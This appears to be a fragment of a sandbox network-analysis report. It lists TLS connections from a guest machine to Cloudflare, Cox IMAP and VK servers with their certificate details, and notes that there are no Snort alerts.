TLSv1 192.168.56.102:49259 104.26.4.15:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 03:f8:79:dd:26:16:32:12:a4:33:99:34:af:f7:33:32:d5:e0:aa:e5 |
TLS 1.2 192.168.56.102:49296 23.81.68.42:993 | C=US, O=Entrust, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K | C=US, ST=Georgia, L=Atlanta, O=Cox Communications, Inc., CN=imap.cox.net | 24:f1:ea:35:95:83:db:e5:e1:99:70:6f:d8:74:63:61:8e:8f:3b:cc |
TLSv1 192.168.56.102:49241 87.240.137.164:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign Organization Validation CA - SHA256 - G2 | C=RU, ST=Saint Petersburg, L=Saint Petersburg, O=V Kontakte LLC, CN=*.vk.com | 6b:39:d3:5a:fa:5a:ee:80:1a:d7:f6:77:30:52:cf:2b:52:a1:82:09 |
TLS 1.2 192.168.56.102:49294 172.67.26.14:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | d2:c1:20:87:03:83:d0:0a:6b:e8:41:a8:be:2a:41:b3:32:f8:85:a2 |
TLS 1.2 192.168.56.102:49298 172.67.26.14:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | d2:c1:20:87:03:83:d0:0a:6b:e8:41:a8:be:2a:41:b3:32:f8:85:a2 |
TLS 1.2 192.168.56.102:49295 172.67.26.14:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | d2:c1:20:87:03:83:d0:0a:6b:e8:41:a8:be:2a:41:b3:32:f8:85:a2 |
TLS 1.2 192.168.56.102:49297 172.67.26.14:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | d2:c1:20:87:03:83:d0:0a:6b:e8:41:a8:be:2a:41:b3:32:f8:85:a2 |
Snort Alerts
No Snort Alerts